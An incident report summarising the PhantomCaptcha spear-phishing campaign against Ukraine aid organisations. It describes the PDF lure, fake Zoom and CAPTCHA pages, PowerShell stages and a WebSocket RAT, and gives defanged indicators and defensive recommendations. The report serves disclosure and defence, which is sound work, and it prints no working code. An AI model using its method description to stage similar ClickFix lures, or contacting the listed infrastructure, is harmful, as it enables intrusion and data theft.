Full Report
Cybersecurity researchers have disclosed details of a coordinated spear-phishing campaign dubbed PhantomCaptcha targeting organizations associated with Ukraine's war relief efforts to deliver a remote access trojan that uses a WebSocket for command-and-control (C2). The activity, which took place on October 8, 2025, targeted individual members of the International Red Cross, Norwegian Refugee
Analysis Summary
# Incident Report: PhantomCaptcha Spear-Phishing Campaign Against Ukraine Aid Groups
## Executive Summary
A coordinated spear-phishing campaign, dubbed **PhantomCaptcha**, targeted organizations associated with Ukraine's war relief efforts, including the Red Cross and UNICEF Ukraine office, using weaponized PDF documents delivered via emails impersonating the Ukrainian President's Office. The attack leveraged a multi-stage delivery mechanism involving fake Zoom sites and CAPTCHA pages to execute PowerShell malware, ultimately deploying a WebSocket Remote Access Trojan (RAT) hosted on Russian-owned infrastructure, providing attackers with arbitrary remote command execution capabilities.
## Incident Details
- Discovery Date: October 22, 2025 (Report published)
- Incident Date: October 8, 2025 (Activity observed)
- Affected Organization: Individual members of International Red Cross, Norwegian Refugee Council, UNICEF Ukraine office, Council of Europe's Register of Damage for Ukraine, and Ukrainian regional government administrations.
- Sector: Non-Profit/Aid, Government Support
- Geography: Ukraine (Targeted victims)
## Timeline of Events
### Initial Access
- **Date/Time:** October 8, 2025 (Primary activity day)
- **Vector:** Spear-phishing emails impersonating the Ukrainian President's Office.
- **Details:** Emails contained a booby-trapped PDF document with an embedded link. Clicking the link redirected victims to a fake Zoom site (`zoomconference[.]app`), leading to a fake Cloudflare CAPTCHA page (ClickFix-style).
### Lateral Movement
- **Details:** Not explicitly detailed regarding internal network movement, but the final payload (WebSocket RAT) allows for arbitrary remote command execution, implying capability for further reconnaissance and movement post-infection.
### Data Exfiltration/Impact
- **Details:** The final payload is a WebSocket RAT capable of arbitrary remote command execution and data exfiltration. Furthermore, associated infrastructure targeted Android devices via fake applications on `princess-mens[.]click` to collect geolocation, contacts, call logs, and media files.
### Detection & Response
- **How it was discovered:** Disclosed by SentinelOne researchers on October 22, 2025.
- **Response actions taken:** The report details the analysis and disclosure of the campaign infrastructure and techniques. Specific organizational containment/eradication steps post-compromise were not provided in the summary.
## Attack Methodology
- **Initial Access:** Spear-phishing via weaponized PDF, redirecting to a fake Zoom URL hosting a deceptive CAPTCHA page designed to trick the user into running a malicious PowerShell command.
- **Persistence:** Not explicitly detailed, but the WebSocket RAT framework suggests maintaining C2 access.
- **Privilege Escalation:** Obfuscated downloader executes subsequent stages via pasted PowerShell commands in the Windows Run dialog.
- **Defense Evasion:** Use of obfuscated PowerShell scripts and a final payload utilizing a WebSocket for C2 communication to potentially evade standard network monitoring.
- **Credential Access:** Not specified, but common in RAT operations.
- **Discovery:** The second-stage malware performs host reconnaissance and sends findings back to the C2 server.
- **Lateral Movement:** Implied capability via RAT command execution, but specific methodology not detailed.
- **Collection:** Reconnaissance data gathered from the affected host; separate infrastructure targets Android data (geolocation, contacts, media files).
- **Exfiltration:** Data exfiltration capabilities inherent in the WebSocket RAT.
- **Impact:** Arbitrary remote command execution, data theft, and potential deployment of additional malware.
## Impact Assessment
- **Financial:** Not specified.
- **Data Breach:** Sensitive data from targeted aid/relief organizations and potentially private data (contacts, location, media) from compromised Android devices.
- **Operational:** Potential disruption to operations of humanitarian and government support entities in the targeted regions.
- **Reputational:** Potential reputational damage to targeted organizations due to perceived security failure or disruption of critical aid activities.
## Indicators of Compromise
- **Network indicators (Defanged):**
- C2 WebSocket Endpoint: `wss://bsnowcommunications[.]com:80`
- Initial Redirect Domain: `zoomconference[.]app`
- Malware Hosting Domain: `goodhillsenterprise[.]com`
- Android Payload Domain: `princess-mens[.]click`
- **File indicators:** Weaponized 8-page PDF document, Obfuscated PowerShell downloader/scripts.
- **Behavioral indicators:** User execution of PowerShell commands via the Windows Run dialog initiated from a browser prompt; WebSocket communication on port 80 established to attacker infrastructure; execution of base64 encoded JSON commands via `Invoke-Expression`.
## Response Actions
- **Containment measures:** Not detailed, but likely involved isolating compromised endpoints and blocking attacker C2 domains/IPs.
- **Eradication steps:** Full removal of the WebSocket RAT and associated scripts from affected systems.
- **Recovery actions:** Rebuilding or restoring systems, password resets, and confirming cessation of all C2 communication.
## Lessons Learned
- **Key takeaways:** Threat actors are highly focused on disrupting and gathering intelligence on humanitarian efforts related to the Ukraine conflict. Sophisticated, multi-stage social engineering techniques (combining fake meetings, CAPTCHAs, and PowerShell) remain highly effective.
- **What could have been done better:** Organizations handling sensitive international relief coordination require rigorous training against contemporary, highly sophisticated spear-phishing, particularly concerning prompts that trigger direct shell command execution.
## Recommendations
- **Prevention measures for similar incidents:**
1. Implement robust security solutions capable of detecting obfuscated PowerShell execution and unexpected outbound WebSocket traffic.
2. Disable or strictly limit PowerShell execution via user pathways, especially those initiated by web browser redirects.
3. Enhance endpoint detection and response (EDR) solutions to flag attempts to run commands pasted into the Windows Run dialog box following web interaction.
4. Enhance security awareness training to warn staff against external prompts requiring them to paste or run commands retrieved from web pages, even if they appear to mimic trusted services (like CAPTCHAs or Zoom).
5. Implement stricter access controls and multi-factor authentication (MFA) organization-wide.